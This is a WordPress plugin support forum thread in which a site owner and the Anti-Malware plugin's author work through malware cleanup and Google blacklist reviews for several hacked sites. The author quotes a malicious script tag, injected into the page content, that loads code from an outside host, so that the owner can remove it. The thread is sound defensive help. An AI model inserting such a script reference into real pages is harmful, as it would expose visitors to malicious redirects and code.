Support » Plugin: Anti-Malware Security and Brute-Force Firewall » still can’t find the issue

  • I donated the $30 and the plugin is still finding the same results. i’ve removed all the bad files and had google re-scan my site and its still “infected”. the only “poptential” files are wordpress stock plugins…
    can anyone help here?

Viewing 14 replies - 1 through 14 (of 14 total)
  • Thread Starter jimwilcox

    (@jimwilcox)

    Sucuri is saying “MW:BLK:2” is my issue but i can’t find anything of the sort in any of my files. i found another thread where you explained that its a generic term and you gave a script example but i couldn’t find that code in anthying either. i’m really at a loss here and i have 8 websites that are ALL down… if anyone can help em i would greatly appreciate it.

    Plugin Author Eli

    (@scheeeli)

    I sounds like you may have already removed the threats but your sites are still blacklisted. If Sucuri is only saying “MW:BLK:2” that means they cannot find any more threats either, but your site is still on a blacklist and it may stay there a while unless you Request a Review.

    Start by logging into your Google Webmaster Tools account for those sites or create an account if you don’t have one. Then check the Security or Malware section and Request a Review.

    Thread Starter jimwilcox

    (@jimwilcox)

    i’ve requested a review 3 times but still says it’s infected.

    Plugin Author Eli

    (@scheeeli)

    What are the dates listed on the URLs that are still infected? When did you first Request a Review?

    Thread Starter jimwilcox

    (@jimwilcox)

    ya, the 13th, then the 14th, then the 15th

    Plugin Author Eli

    (@scheeeli)

    Which of my last two questions are you answering with that list of date?

    If those are the date on the malicious URL found then that is great news, you just need to wait for you review to go through.

    If those are the date that you requested reviews, then what are the dates listed on the URLs that are still infected?

    Thread Starter jimwilcox

    (@jimwilcox)

    i’ve asked for a review on all those dates and gotten a response a few hours later saying the sites have “failed”.

    Plugin Author Eli

    (@scheeeli)

    Can you post the details of that report so that I can see what threats they are referring to and check the URLs listed?

    Thread Starter jimwilcox

    (@jimwilcox)

    OK so the details don’t show anything. has all the standard “Malware, this is what you need to do” text… then below all that it says “examples” and gives my website address. http://blacksagestudio.com/

    this is the same for all of my websites

    I’ve now got the plugin installed from my root and ran it over the entire server and it found more errors so i clean them all out. I did another review on google and i’m getting the same reply as above. i ran the plugin again and it returned 100% ok.

    my next step will be to re-install ALL my wordpress installations but i really don’t want to go there if i don’t have to.

    have you had a change to look at it?

    Thread Starter jimwilcox

    (@jimwilcox)

    have you had a chance to check out the website?

    Plugin Author Eli

    (@scheeeli)

    I don’t think there is any more malicious PHP code on this site but it does look like there was some HTML added to the bottom of your page content. Edit the home page of that site, on the “text” tab you should see this script link at the bottom of the page:
    <script type="text/javascript" src="http://www.hcifx.com/troyengelhardt/index1261.php"></script>
    Take that out and request another review (if Webmaster Tool lists any other pages you may want to check the content of those as well).

    Thread Starter jimwilcox

    (@jimwilcox)

    OK so i’ve removed all that code (holy shit was it in EVERYTHING) and all my sites went live again (thank you). yesterday google reported these two pages as malicious again and i can’t find the issues anywhere… I scanned the site and all clear.

    can you take a look for me?

    ARTISTS

    Catalog

    Plugin Author Eli

    (@scheeeli)

    Google says that those pages redirect visitors to hcifx . com but I don’t see it, it could have been cached by them, what are the dates on those two URLs listed as?

    You can try “Fetch as Googlebot” from you Webmaster Tools account. If you don’t see it there then just request another review.

Viewing 14 replies - 1 through 14 (of 14 total)
  • The topic ‘still can’t find the issue’ is closed to new replies.